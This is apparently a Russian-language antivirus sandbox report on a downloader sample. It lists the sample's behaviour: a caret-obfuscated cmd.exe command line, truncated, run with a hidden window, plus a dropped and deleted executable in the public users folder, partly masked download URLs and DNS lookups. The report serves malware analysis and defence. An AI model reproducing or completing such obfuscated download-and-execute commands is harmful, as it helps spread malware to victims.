Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V/C"^s^e^t ^w^7=^8^7^_^ ^q*^j^ ^'4^7^ C^ ^z^ ^b^Z^S^ ^m^?^e^ n^{( Jv^|^ ^p^S^E^ ^<^+{^ (^'^W^ ^z^0^ ^ ^:^M^3^ ^J^L^U^ ^J^d^[^ ^T^.^Z^ ^,Z^m^ ^xN^\^}^{^o^6^}^Z^`V^{^t^1^u^h^A^8^7cP^;^9^t%R^F^aC...
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\110.exe
Удаляет следующие файлы
- C:\users\public\110.exe
Сетевая активность
Подключается к
- 'fl###ganlaw.com':80
- 'la#######olidayapartments.com':80
- 'fa##op27.ru':80
TCP
Запросы HTTP GET
- http://www.fl###ganlaw.com/wkM
- http://la#######olidayapartments.com/uxbCg173
- http://fa##op27.ru/uEEhY0
UDP
- DNS ASK kn###npower.com
- DNS ASK fl###ganlaw.com
- DNS ASK la#######olidayapartments.com
- DNS ASK fa##op27.ru
- DNS ASK ju###saleo.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"^s^e^t ^w^7=^8^7^_^ ^q*^j^ ^'4^7^ C^ ^z^ ^b^Z^S^ ^m^?^e^ n^{( Jv^|^ ^p^S^E^ ^<^+{^ (^'^W^ ^z^0^ ^ ^:^M^3^ ^J^L^U^ ^J^d^[^ ^T^.^Z^ ^,Z^m^ ^xN^\^}^{^o^6^}^Z^`V^{^t^1^u^h^A^8^7cP^;^9^t%R^F^aC...' (со скрытым окном)
